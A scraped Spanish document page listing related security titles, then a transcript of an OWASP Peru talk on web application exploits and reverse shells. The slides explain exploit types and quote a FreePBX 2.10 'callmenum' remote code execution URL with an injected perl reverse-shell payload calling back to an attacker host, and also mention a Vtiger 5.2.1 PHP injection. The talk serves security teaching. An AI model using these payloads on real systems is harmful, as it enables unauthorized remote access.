Web Application exploiting and Reversing Shell



Documentos relacionados
Análisis Forense. de un. Ataque Web

Nmap web hacking. Walter Cuestas Agramonte.

Ataques XSS en Aplicaciones Web

..::[Manual Basico Metasploit]::..

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.

Hacking en 5 pasos usando Software libre

Introducción a OWASP OWASP. The OWASP Foundation

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Datos Personales en el Ciclo de Vida de Desarrollo Seguro

Quienes somos. Eduardo Arriols Roberto Lopez

CEFIRE de Valencia Curso Iniciación a Edubuntu Código: 07VA66EA036

Modelado de Amenazas Una Introducción

BASES PARA LA 1RA HACKATÓN SAN ISIDRO

3-ANÁLISIS DE VULNERABILIDADES

100% Laboratorios en Vivo

Pruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos?

Tu Educación en Manos de Profesionales

Ataques a Bases de Datos Webinar Gratuito

Voz sobre IP con GNU/Linux

WebApp Penetration Testing

Máster en Seguridad Informática & Hacking Ético

CURSOS DE ESPECIALIZACIÓN EN TECNOLOGÍA DE INFORMACIÓN

GUIA RÁPIDA DE VNC Antonio Becerro 2005

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita.

Guía del usuario de la utilidad Intel One Boot Flash Update

Test de intrusión (Penetration Test) Introducción

Procedimiento. Actualización de Kit de Conexión de Comercios Webpay versión 5.X a Canales Remotos Operaciones. Transbank S.A.

Sesión 5: Wine. Proyecto de formación en centros CEIP Benimamet Valencia

Seguridad Ofensiva en WordPress

CORPORACIÓN MEXICANA DE INVESTIGACIÓN EN MATERIALES, S.A. DE CV

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales

TEMARIO Curso Elastix

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec

Ataques a Aplicaciones de Bases de Datos

UNIVERSIDAD DE LA RIOJA

Nuevos ataques por medio de correo electrónicos para infectar a miles de maquinas con troyanos.

Investigación universitaria responsable. Mod. 6 UD 5: Los estudiantes como investigadores en la universidad.(ii)

Ethical Hacking and Countermeasures

Pruebas de Intrusión de Aplicación

(PHP y APACHE), y el programa de comunicación Skype, para controlar de manera

Escalar de un Dominio a otro

==== Introducción. ==== Buscando un fallo

LA NUEVA CIENCIA DE LA SOSTENIBILIDAD

Presentación. Porqué formarte con nosotros?

Análisis de un ataque de malware basado en web. Autor: Jorge Mieres jorge.mieres.ef#gmail.com (febrero de 2009)

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez

SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Sesión 5: Instalación de aplicaciones

I Descripción de guía. Guía Instalación de un servidor VoIP. Contenido. 1. Objetivos de aprendizaje: 2. Equipo y software requerido:

Política de Privacidad y Condiciones de Uso del Portal

Windows Server 2012: Infraestructura de Escritorio Virtual

OWAND 11 Granada Ingeniería social

Ettercap: Para instalación en ambientes Linux (aunque la mayoría de distribuciones ya las trae instaladas):

POLITICA DE PRIVACIDAD Y PROTECCION DE DATOS PERSONALES

Servicios de instalación y puesta en marcha de HP para HP Insight Control

El proceso de Instalación de Microsoft SQL Server 2008

Explotación a CMSs Web

La importancia de las pruebas de penetración (Parte I)

Visión General de GXportal. Última actualización: 2009

RETO FORENSE EPISODIO III Resumen Ejecutivo

Introducción a la seguridad informática

Twitter empresarial. Autor: PM Consultores Tutor: Luis Tapia y Juan Adolfo Mogrovejo

DESCARGO DE RESPONSABILIDADES Y COPYRIGHT

Ética en la Investigación con seres humanos. Mod. 3 UD4: La investigación con datos personales

POLÍTICAS DE SEGURIDAD PARA EL DESARROLLO DE SISTEMAS DE CAPUFE

ACERCA DEL COACHING. Acerca del Coaching Página 1/5

COMO ABORDAR LOS RECURSOS EN EL ENTORNO DE APRENDIZAJE PRACTICO

CONTRATO DE ACEPTACIÓN DE SERVICIOS DE ATENCIÓN DENTAL CHILE SONRIE

MANTENIMIENTO Y SOPORTE

Presentada por: Juan Asenjo Marketing Manager, Thales e-security, Inc. Diego Laborero Regional Product Manager, Macroseguridad.org

Gestión de Proyectos con Open Project

Tema 3.4: Arquitecturas Software para Autorización

Redes sociales utilizadas para propagar malware

INSTRUCTIVO NORMAS DE MANEJO DEL SOFTWARE

Solución al Reto Hacking v2.0 de Informática 64

Somos : Misión. Visión

Solución al Primer Reto

Anexo I. Politicas Generales de Seguridad del proyecto CAT

Curso Online. System Security Auditor

GUÍA TÉCNICA PARA LA DEFINICIÓN DE COMPROMISOS DE CALIDAD Y SUS INDICADORES

Hacking Ético Web. I Jornadas Tecnológicas CEEPS Carlos García García i52gagac@uco.es

Seguridad Informática: Test de intrusión

La OWASP Foundation y los objetivos del capítulo español OWASP 16/6/2006. The OWASP Foundation

Respuestas a consultas

RESUMEN GENERAL EXCEPCIONES DE RESPONSABILIDAD TÉRMINOS DE USO

Facultad de Ciencias del Hombre y la Naturaleza SISTEMAS OPERATIVOS DE REDES CICLO II Materia: Sistemas Operativos de Redes Tema:

TEMA 17 PASIVO CORRIENTE ( III ): PROVISIONES A CORTO PLAZO TEMA 20 PASIVO NO CORRIENTE ( II ): PROVISIONES A LARGO PLAZO. Enunciados sin Soluciones

TELNET SSH FTP. Redes de Computadoras. 1º Cuatrimestre Adrian Juri Juan Pablo Moraes Patricio Tella Arena

MANUAL DE POLITICAS PROTECCION DE DATOS PERSONALES OBJETIVO DEL MANUAL

Proyecto PLUMA Plataforma Universal Microcontrolada Aplicaciones didácticas e industriales

INTRODUCCION. Tema: Protocolo de la Capa de aplicación. FTP HTTP. Autor: Julio Cesar Morejon Rios

Conexión Remota Usando OpenSSH Con Claves Publicas Integrante: Felix Taborda.

MiVoice 6725ip Teléfono Microsoft Lync REV03 GUÍA RÁPIDA DE USUARIO

Plan de transición de la certificación con las normas ISO 9001 e ISO 14001, versión Fecha de Emisión:

Seguridad Informática

NORMAS DE USO ACEPTABLE Y SEGURIDAD DE LA RED DE DATOS DE LA UNIVERSIDAD AUTÓNOMA DE MADRID (U.A.M.)

G Data Informe técnico. Behaviour Blocking. (Escudo de comportamiento) Go safe. Go safer. G Data. Marco Lauerwald Marketing

Transcripción:

OWASP Perú Chapter Meeting The OWASP Foundation http://www.owasp.org Web Application exploiting and Reversing Shell Juan Oliva @jroliva jroliva@gmail.com Copyright The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

Juan Oliva $ Whois @jroliva Linuxero de toda la vida Consultor de proyectos de Ethical Hacking Consultor de proyectos de Telefonía y VoIP Certificaciones C EH, CPTE, OSEH, BNS, dcaa, ECE, ESM, LPIC-1, Novell CLA Intructor & Trainig - Certificación Linux Professional Institute LPI-C1 - Certificación de Seguridad de Elastix ESM - Cursos Ethical Hacking y Voz sobre IP 2

DESCARGO DE RESPONSABILIDAD Esta presentación tiene como propósito proveer unicamente información. No aplicar este material ni conocimientos sin el Consentimiento explícito que autorice a hacerlo. Los lectores (participantes, oyentes, videntes) asumen la responsabilidad completa por la aplicación o experimentación de este material y/o conocimientos presentados. El(los) autor(es) quedan exceptuados de cualquier reclamo directo o indirecto respecto a daños que puedan haber sido causados por la aplicación de este material y/o conocimientos expuestos. La información aquí expuesta representa las opiniones y perspectivas propias del autor respecto a la materia y no representan ninguna posicion oficial de alguna organización asociada. 3

Introducción 4

Qué es un exploit 5

Qué es un exploit Es un programa o código Explota o aprovecha una vulnerabilidad existente Se puede ejecutar de forma manual Pero tambien de forma automatizada 6

Qué es un exploit El código no necesariamente puede ser malisioso en si mismo Sin embargo siempre se usa para otros fines como : Acceso no autorizado a sistemas Malware como gusanos y trojanos 7

Tipos de exploit 8

Tipos de exploits Remotos Ejecutados desde una ubicacion diferente a la red de la victima Si es exitoso es posible tomar el control del equipo comprometido parcial o totalmente. Locales Permite elevar privilegios de un sistema desde un usuario no privilegiado 9

Donde los encuentran?? exploit-db.com packetstormsecurity.com exploitsdownload.com cvedetails.com Entre otros... 10

Como se hacen los exploits 11

Como se hacen los exploits Pueden ser escritos en diferentes lenguajes C, C++ perl bash nc 12

Como se hacen los exploits Sin embargo, tambien es posible desarrollarlos en python o PHP inclusive PHP PYTHON 13

Ciclo de vida de un exploit 14

Ciclo de vida de un exploit (formal) 15

Ciclo de vida de un exploit (resumido) 16

Aplicaciones web vulnerables 17

Aplicaciones web vulnerables 18

Aplicaciones web vulnerables FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution Vulnerabilidad es de tipo Remote Code Execution Exploit, es decir inyecta código en una página no autentificada variables que generan la ejecución de sentencias del sistema operativo vía la función system de asterisk, Resultado : genera una conexión reversa desde el host atacado hacia el host del atacante vía el puerto 443. 19

Pero como funciona?? 20

Pero como funciona?? 21

Pero como funciona?? 22

Pero como funciona?? URL A LA CUAL INGRESA EL PROGRAMA: /recordings/misc/callme_page.php?action=c&callmenum=' 23

Pero como funciona?? Código que inyecta : Un poco feo no?? 24

Pero como funciona?? Código que inyecta str(extension) '@from-internal/n Application: system Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"' str(lhost) ':' str(lport) '"); STDIN->fdopen($c,r); $~->fdopen($c,w);system$_ while<>;' Ahora si la veo!! 25

Pero como funciona?? 26

Pero como funciona?? Bingo tengo shell!! 27

Pero como funciona?? Ahora vamos a la práctica DEMO TIME!! Exploit en Freepbx 2.10 28

Aplicaciones web vulnerables 29

Aplicaciones web vulnerables PHP CODE INYECTION en VTIGER 5.2.1 Descripción : El fundamento básico de esta técnica, es inyectar código arbitrario, como lo hace una inyección SQL Resultado : Obtención de una Shell reversa. 30

Pero como funciona?? Ahora vamos a la práctica DEMO TIME!! Exploit en Vtiger 5.2.1 31

32

Conclusiones Es necesario siempre estar informado de las nuevas vulnerabilidades. Usa twitter no facebook para informarte. No por que sea, software libre es mas vulnerable... al contrario!! 33

Any Questions? Juan Oliva Consultor en Ethical Hacking y Voip gtalk :jroliva@gmail.com Twiter : @jroliva Blog : http://jroliva.wordpress.com/